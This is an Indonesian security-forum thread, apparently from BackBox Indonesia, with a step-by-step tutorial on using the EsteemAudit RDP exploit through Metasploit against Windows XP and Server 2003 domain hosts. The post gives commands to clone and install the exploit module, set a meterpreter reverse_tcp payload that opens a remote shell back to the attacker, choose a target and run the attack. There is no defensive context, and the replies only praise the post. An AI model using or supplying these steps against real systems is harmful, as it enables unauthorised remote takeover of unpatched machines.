![]() |
RDP Exploit dengan EsteemAudit - Printable Version +- BackBox Indonesia (https://www.backboxindonesia.or.id) +-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html) +--- Forum: Exploitation (https://www.backboxindonesia.or.id/forum-13.html) +--- Thread: RDP Exploit dengan EsteemAudit (/thread-223.html) |
RDP Exploit dengan EsteemAudit - penjagalilin - 06-11-2017 Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP. ![]() Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit 1. Download & ekstrak file yang dibutuhkan Source : Esteemaudit-Metasploit Atau clone langsung seperti berikut Code: root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git 2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan. Code: root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp 3. Buka msfconsole dan mulai exploitasi dengan EsteemAudit Code: msf > use exploit/windows/rdp/esteemaudit Jika target/korban adalah 64bit maka : set PAYLOAD windows/x64/meterpreter/reverse_tcp set TARGETARCHITECTURE x86 64-bit Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut Code: msf exploit(esteemaudit) > show targets ![]() Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut. Code: msf exploit(esteemaudit) > set TARGET 4 Jika sukses akan terbuka sesi meterpreter seperti berikut. ![]() Bonus Video : NOTES : Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP. Oke sekian pos nya, semoga bermanfaat. Terimakasih. RE: RDP Exploit dengan EsteemAudit - koboi - 06-11-2017 semakin di depan (y) RE: RDP Exploit dengan EsteemAudit - penjagalilin - 06-13-2017 zeeeeb mhanx RE: RDP Exploit dengan EsteemAudit - Hightech - 06-14-2017 Mantap mhanx |